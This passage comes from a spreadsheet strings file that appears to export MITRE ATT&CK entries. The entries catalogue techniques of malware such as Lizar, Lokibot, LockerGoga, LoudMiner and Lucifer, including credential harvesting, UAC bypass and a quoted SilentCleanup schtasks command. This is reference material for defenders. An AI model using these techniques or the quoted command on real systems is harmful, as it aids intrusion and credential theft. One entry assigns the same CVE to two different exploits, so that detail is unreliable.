    <t>relationship--f93060a3-7c58-444f-a45e-1386c289cee6</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) can determine if the current user has admin privileges.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--32a62862-3dc9-4082-8570-d01abe25e00b</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) can use HTTP and HTTPS for C2 communications.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--9d8ea8fe-c0d5-4f3b-b0ed-253708c07a0b</t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) has encrypted data before sending it to the server.(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t>relationship--ff9e8d81-dc74-4494-a4aa-54f8039f9ad7</t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) can retrieve browser history and database files.(Citation: Threatpost Lizar May 2021)(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t>relationship--1be14720-a61a-4ac6-a6f6-f84c74c60d43</t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) has a module to collect usernames and passwords stored in browsers.(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t>relationship--ba93bce7-7214-45e9-9deb-4fefb5038aab</t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) can decrypt its configuration data.(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t>relationship--9b8ff6e6-8b67-4182-9752-fa1cf15c0485</t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) has used the PowerKatz plugin that can be loaded into the address space of a PowerShell process through reflective DLL loading.(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t>relationship--410ec59e-9e11-4acc-98d6-4d7c63f09c8d</t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) can collect email accounts from Microsoft Outlook and Mozilla Thunderbird.(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t>relationship--a23d8e4f-6e3c-4b07-a63a-216764d61ec0</t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) can support encrypted communications between the client and server.(Citation: Threatpost Lizar May 2021)(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t>relationship--c77046c5-1ea2-4d3f-a19e-0ea7141d7e9c</t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) can download additional plugins, files, and tools.(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t>relationship--a19231c9-e6b4-4d3f-9c9d-f4e85cba5e3a</t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) can run [Mimikatz](https://attack.mitre.org/software/S0002) to harvest credentials.(Citation: Threatpost Lizar May 2021)(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t>relationship--58b1c6e7-5481-4162-a90c-0b7122c3680d</t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) has used various Windows API functions on a victim's machine.(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t>relationship--44927ff0-b153-4122-a881-ff078a3e81cd</t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) can execute PE files in the address space of the specified process.(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t>relationship--9e13c22e-5758-4e8f-920c-7dbab940b02b</t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) has used PowerShell scripts.(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t>relationship--9d239ea5-b191-4e30-9d0c-fd5ee69e621d</t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) has a plugin designed to obtain a list of processes.(Citation: Threatpost Lizar May 2021)(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t>relationship--e9a96b5e-5d6c-46c7-85df-ff16d1efeb4d</t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) can migrate the loader into another process.(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t>relationship--07c87a67-32d0-4b86-9345-aad1a0241340</t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) can take JPEG screenshots of an infected system.(Citation: Threatpost Lizar May 2021)(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t>relationship--638b21af-b5d5-44dd-9d14-ea3c2be3eb4e</t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) can search for processes associated with an anti-virus product from list.(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t>relationship--b5a6b7ee-7c1b-41c6-91d8-554ca468426e</t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) can collect the computer name from the machine,.(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t>relationship--aaa42f0a-5709-45e2-81d3-0687b3c72cc9</t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) can retrieve network information from a compromised host.(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t>relationship--dd18682c-873d-4b26-b41a-2696101f8eb8</t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) has a plugin to retrieve information about all active network sessions on the infected server.(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t>relationship--ffcfa61b-2b35-4d06-9298-836fe50f5bed</t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) can collect the username from the system.(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t>relationship--6f037ffb-3e85-41d0-8c48-ae36d0996d57</t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) has a command to open the command-line on the infected system.(Citation: Threatpost Lizar May 2021)(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t>relationship--08d8941b-e4be-44f1-8a3f-765b8f5d1196</t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) has a plugin that can retrieve credentials from Internet Explorer and Microsoft Edge using `vaultcmd.exe` and another that can collect RDP access credentials using the `CredEnumerateW` function.(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t>relationship--5d925633-c463-4ca8-afb7-888505c70633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</si>
  <si>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</si>
  <si>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relationship--1f5c6a39-aa0b-469e-aabe-67e4d237b213</t>
  </si>
  <si>
    <t>[LoJax](https://attack.mitre.org/software/S0397) has loaded an embedded NTFS DXE driver to be able to access and write to NTFS partitions.(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>relationship--328ab5f5-017c-4d4c-ab52-078257e39bd7</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</si>
  <si>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</si>
  <si>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relationship--3f4700e6-71a4-4995-b173-00974a528905</t>
  </si>
  <si>
    <t>[LoJax](https://attack.mitre.org/software/S0397) is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>relationship--e9f52758-d5aa-4a16-b614-ea756a0cf270</t>
  </si>
  <si>
    <t xml:space="preserve">[LoJax](https://attack.mitre.org/software/S0397) is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.(Citation: ESET LoJax Sept 2018) </t>
  </si>
  <si>
    <t>relationship--63218f86-09ba-41eb-9ca5-fa78730e94f3</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been observed changing account passwords and logging off current users.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)</t>
  </si>
  <si>
    <t>relationship--57385cb2-e3ef-4006-b465-a5a48632d02b</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been signed with stolen certificates in order to make it look more legitimate.(Citation: Wired Lockergoga 2019)</t>
  </si>
  <si>
    <t>relationship--c035989f-a86f-4746-a9d4-3286dc68e473</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</si>
  <si>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</si>
  <si>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relationship--31daba72-fb27-45a9-9224-991032b605a8</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) installation has been immediately preceded by a "task kill" command in order to disable anti-virus.(Citation: Wired Lockergoga 2019)</t>
  </si>
  <si>
    <t>relationship--29d1699f-c87d-4e6c-ac34-b1b46c43286a</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been observed deleting its original launcher after execution.(Citation: CarbonBlack LockerGoga 2019)</t>
  </si>
  <si>
    <t>relationship--20904798-df45-48a6-8428-9e4fb913f6ae</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been observed moving around the victim network via SMB, indicating the actors behind this ransomware are manually copying files form computer to computer instead of self-propagating.(Citation: Unit42 LockerGoga 2019)</t>
  </si>
  <si>
    <t>relationship--d80bbf0c-2fb4-4272-a878-65662452d3ca</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been observed shutting down infected systems.(Citation: Wired Lockergoga 2019)</t>
  </si>
  <si>
    <t>relationship--3c7bb2a4-eede-4dae-ac41-03782729a961</t>
  </si>
  <si>
    <t xml:space="preserve">
[Lokibot](https://attack.mitre.org/software/S0447) has utilized multiple techniques to bypass UAC.(Citation: Talos Lokibot Jan 2021)</t>
  </si>
  <si>
    <t>relationship--892763cd-4967-49f6-b8a8-212a6f18a19b</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has stolen credentials from multiple applications and data sources including Windows OS credentials, email clients, FTP, and SFTP clients.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>relationship--1f888716-1e49-4d8d-b693-67c6eae8a775</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and the Chromium and Mozilla Firefox-based web browsers.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>relationship--fe69bcdd-8df4-44e3-8994-b46e4d4c8aac</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has decoded and decrypted its stages multiple times using hard-coded keys to deliver the final payload, and has decoded its server response hex string using XOR.(Citation: Talos Lokibot Jan 2021)</t>
  </si>
  <si>
    <t>relationship--13bc2a82-c51d-4410-9e62-223df287b8f7</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to initiate contact with command and control (C2) to exfiltrate stolen data.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>relationship--7cafb7b2-5227-4340-b531-7bd134645d30</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) will delete its dropped files after bypassing UAC.(Citation: Talos Lokibot Jan 2021)</t>
  </si>
  <si>
    <t>relationship--d5bac840-bebe-4209-b16d-b6ae9ff96982</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) can search for specific files on an infected host.(Citation: Talos Lokibot Jan 2021)</t>
  </si>
  <si>
    <t>relationship--53339b8f-f66b-4bcc-86a8-31daaeebb0e6</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to copy itself to a hidden file and directory.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>relationship--af1fc367-9987-4076-9ce6-2414cd2d4a1f</t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) downloaded several staged items onto the victim's machine.(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t>relationship--f7328802-07f4-4f00-821a-962fb2678e15</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to capture input on the compromised host via keylogging.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>relationship--6494b2d2-8f8f-4e81-886c-dadd57df6edc</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has tricked recipients into enabling malicious macros by getting victims to click "enable content" in email attachments.(Citation: TrendMicro Msiexec Feb 2018)(Citation: Talos Lokibot Jan 2021)</t>
  </si>
  <si>
    <t>relationship--da33f077-8ce2-4a2d-a8ed-f9f21799c80e</t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) has modified the Registry as part of its UAC bypass process.(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t>relationship--710919f6-2c74-4f41-be51-af848ad691af</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has used LoadLibrary(), GetProcAddress() and CreateRemoteThread() API functions to execute its shellcode.(Citation: Talos Lokibot Jan 2021)</t>
  </si>
  <si>
    <t>relationship--ab90bb4c-96d2-4c01-ac66-fe8bf585d88c</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has obfuscated strings with base64 encoding.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>relationship--0dd73de5-d615-4455-a552-ff382ec75e82</t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) has used PowerShell commands embedded inside batch scripts.(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t>relationship--cafdf392-1a61-422f-80ca-4d0d088bd44a</t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) has used process hollowing to inject itself into legitimate Windows process.(Citation: Infoblox Lokibot January 2019)(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t>relationship--33a464ab-cc0d-436d-9bcd-9d6e08994370</t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) has reflectively loaded the decoded DLL into memory.(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t>relationship--203e48b0-5175-4cc9-9e49-8cae08f26f52</t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) embedded the commands &lt;code&gt;schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I&lt;/code&gt; inside a batch script.(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t>relationship--754699a2-fa2c-4ac2-82cc-be6b7c0c8a6b</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447)'s second stage DLL has set a timer using “timeSetEvent” to schedule its next execution.(Citation: Talos Lokibot Jan 2021)</t>
  </si>
  <si>
    <t>relationship--85b5efa3-9bd0-4685-a211-78f17a3747c7</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has used several packing methods for obfuscation.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>relationship--0c5577aa-30c5-47f5-83f3-34260860e2b6</t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) is delivered via a malicious XLS attachment contained within a spearhpishing email.(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t>relationship--060894ab-c1ec-488c-8d66-25924c82ad58</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the computer name and Windows product name/version.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>relationship--a9e6a51e-69b1-4b21-9db1-5aabdded2f0a</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the domain name of the infected host.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>relationship--d331f4b3-047a-4418-9611-f2b8445692b3</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the username on the infected host.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>relationship--3ccef052-7ac9-47b1-9be6-8c140f279941</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has performed a time-based anti-debug check before downloading its third stage.(Citation: Talos Lokibot Jan 2021)</t>
  </si>
  <si>
    <t>relationship--76f712e1-cc4c-43a2-b6a7-c288ac206aac</t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) has used VBS scripts and XLS macros for execution.(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t>relationship--0077d777-1e32-4b34-ab12-461b34110ffe</t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) has used HTTP for C2 communications.(Citation: Infoblox Lokibot January 2019)(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t>relationship--e129d95a-e98e-4bf8-b065-57651dc3335d</t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) has used &lt;code&gt;cmd /c&lt;/code&gt; commands embedded within batch scripts.(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t>relationship--65692352-9f25-4410-b715-5cdce6ee25cd</t>
  </si>
  <si>
    <t>S0582</t>
  </si>
  <si>
    <t>LookBack</t>
  </si>
  <si>
    <t>malware--c9ccc4df-1f56-49e7-ad57-b383e1451688</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) side loads its communications module as a DLL into the &lt;code&gt;libcurl.dll&lt;/code&gt; loader.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>relationship--fdbb45a4-1151-4c21-909c-1c653c883544</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) has a function that decrypts malicious data.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>relationship--fdb22ee1-d90b-496b-a7f7-baf155a1930c</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) removes itself after execution and can delete files on the system.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>relationship--a48829f9-c991-4122-afda-a46a82faef95</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can retrieve file listings from the victim machine.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>relationship--cb62e09c-5092-418e-99d3-ab7b5fc73017</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) has a C2 proxy tool that masquerades as &lt;code&gt;GUP.exe&lt;/code&gt;, which is software used by Notepad++.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>relationship--6f201842-1ce8-459f-a7a7-a81d6e7950a9</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) uses a custom binary protocol over sockets for C2 communications.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>relationship--b46d0c20-61f1-4ab4-be3b-fa7dace805f0</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can list running processes.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>relationship--65f12d79-f04e-441d-8068-1962963c4965</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) sets up a Registry Run key to establish a persistence mechanism.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>relationship--928977f5-9602-4020-b8e8-31a8e3881225</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can take desktop screenshots.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>relationship--8630a3fb-9f65-4c54-b3d6-c379d03029dc</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can kill processes and delete services.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>relationship--08bc171a-147c-4888-a0cb-c5fcebdc9b95</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) uses a modified version of RC4 for data transfer.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>relationship--8c418cb5-2cff-45f9-ad5d-b8b65cde713c</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can enumerate services on the victim machine.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>relationship--651334a7-9d6c-444e-a935-1e7847abfcb1</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can shutdown and reboot the victim machine.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>relationship--66d53000-135b-448d-988a-3ff5d53b2c5b</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) has used VBA macros in Microsoft Word attachments to drop additional files to the host.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>relationship--3e55d71d-b733-41a9-9ad2-a53131617c78</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582)’s C2 proxy tool sends data to a C2 server over HTTP.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>relationship--78debfd5-eeb1-4432-85f1-787fe3ffb977</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) executes the &lt;code&gt;cmd.exe&lt;/code&gt; command.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>relationship--327569f6-724f-4c46-bbdc-644c6416148b</t>
  </si>
  <si>
    <t>S0451</t>
  </si>
  <si>
    <t>LoudMiner</t>
  </si>
  <si>
    <t>malware--f99f3dcc-683f-4936-8791-075ac5e58f10</t>
  </si>
  <si>
    <t xml:space="preserve">[LoudMiner](https://attack.mitre.org/software/S0451) has obfuscated various scripts.(Citation: ESET LoudMiner June 2019)	</t>
  </si>
  <si>
    <t>relationship--14476a38-f67d-45ed-a932-6a9c593e0d61</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) is typically bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>relationship--870c08fa-6112-4d08-9b84-59df09f27b4d</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) deleted installation files after completion.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>relationship--958b9dfc-1c5b-490c-86c5-137e0def493e</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) has set the attributes of the VirtualBox directory and VBoxVmService parent directory to "hidden".(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>relationship--533d9f70-6f01-4eed-a198-bf0d29586897</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used SCP to update the miner from the C2.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>relationship--8f43b5c3-883a-40b7-b9b2-a96ba8c7001b</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</si>
  <si>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</si>
  <si>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relationship--7398839c-3feb-4162-a3d2-dda8fc2f0375</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</si>
  <si>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</si>
  <si>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relationship--131d75f1-84c3-4ef8-b858-7f74aa7ce157</t>
  </si>
  <si>
    <t xml:space="preserve">[LoudMiner](https://attack.mitre.org/software/S0451) used an MSI installer to install the virtualization software.(Citation: ESET LoudMiner June 2019)	</t>
  </si>
  <si>
    <t>relationship--e3540915-e2f8-4f99-8f81-57a566e9d115</t>
  </si>
  <si>
    <t xml:space="preserve">[LoudMiner](https://attack.mitre.org/software/S0451) has encrypted DMG files.(Citation: ESET LoudMiner June 2019)	</t>
  </si>
  <si>
    <t>relationship--2f96597c-70d9-41ba-b019-fb7510d3d732</t>
  </si>
  <si>
    <t xml:space="preserve">[LoudMiner](https://attack.mitre.org/software/S0451) used the &lt;code&gt;ps&lt;/code&gt; command to monitor the running processes on the system.(Citation: ESET LoudMiner June 2019)	</t>
  </si>
  <si>
    <t>relationship--1232c797-ebf4-4036-9ebb-a65fbe8b1443</t>
  </si>
  <si>
    <t xml:space="preserve">[LoudMiner](https://attack.mitre.org/software/S0451) harvested system resources to mine cryptocurrency, using XMRig to mine Monero.(Citation: ESET LoudMiner June 2019)	</t>
  </si>
  <si>
    <t>relationship--774302ff-3ab9-4328-a434-6188efe0928a</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) has used QEMU and VirtualBox to run a Tiny Core Linux virtual machine, which runs XMRig and makes connections to the C2 server for updates.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>relationship--9fc89cc1-ef57-461c-9324-0ebe43999c07</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) started the cryptomining virtual machine as a service on the infected machine.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>relationship--94824fdd-25fa-4d23-9220-825f04c4bcc6</t>
  </si>
  <si>
    <t xml:space="preserve">[LoudMiner](https://attack.mitre.org/software/S0451) has monitored CPU usage.(Citation: ESET LoudMiner June 2019)	</t>
  </si>
  <si>
    <t>relationship--9e339696-4e81-496f-808e-82d63b62c331</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used a script to gather the IP address of the infected machine before sending to the C2.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>relationship--89bd934f-2d0b-487e-9235-138403b91267</t>
  </si>
  <si>
    <t xml:space="preserve">[LoudMiner](https://attack.mitre.org/software/S0451) used shell scripts to launch various services and to start/stop the QEMU virtualization.(Citation: ESET LoudMiner June 2019)	</t>
  </si>
  <si>
    <t>relationship--55aa08a3-d33a-465b-8d48-d25566ce0957</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used a batch script to run the Linux virtual machine as a service.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>relationship--e42b5898-2a13-4266-941c-8ef8b8090c8d</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) can automatically launch a Linux virtual machine as a service at startup if the AutoStart option is enabled in the VBoxVmService configuration file.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>relationship--80bead39-b050-48d9-b185-aa31d1681a61</t>
  </si>
  <si>
    <t>[Lslsass](https://attack.mitre.org/software/S0121) can dump active logon session password hashes from the lsass process.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--56e40368-38a7-4415-9ebc-8c84694bc7d6</t>
  </si>
  <si>
    <t>S0532</t>
  </si>
  <si>
    <t>Lucifer</t>
  </si>
  <si>
    <t>malware--54a73038-1937-4d71-a253-316e76d5413c</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--bfc5ca31-5d92-4c51-be33-e610df85055a</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can clear and remove event logs.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--4ceb5590-5539-424c-9859-1a35d62bbf04</t>
  </si>
  <si>
    <t>17 November 2020</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can decrypt its C2 address upon execution.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--1c9d4988-d9ea-4dd5-aef1-adb0232e87a3</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can exploit multiple vulnerabilities including EternalBlue (CVE-2017-0144) and EternalRomance (CVE-2017-0144).(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--c1a8eea8-f273-4dad-8ae0-d5c93bf5467f</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can download and execute a replica of itself using [certutil](https://attack.mitre.org/software/S0160).(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--322a78a2-1765-414f-9b07-29a1360e1134</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can use [certutil](https://attack.mitre.org/software/S0160) for propagation on Windows hosts within intranets.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--427a272e-4500-4216-8816-a6c7d4492f3e</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can execute TCP, UDP,  and HTTP denial of service (DoS) attacks.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--bb19637b-a68f-48fd-8b14-41607f32888d</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can scan for open ports including TCP ports 135 and 1433.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--eacb7614-6cc9-4eb9-92fc-bba53ac4f59a</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) has attempted to brute force TCP ports 135 (RPC) and 1433 (MSSQL) with the default username or list of usernames and    passwords.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--b7e456b1-ed5e-48f0-be6e-df3e7d6b4044</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can identify the process that owns remote connections.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--23c028d1-6963-4033-b91f-5953413df43c</t>
  </si>
  <si>
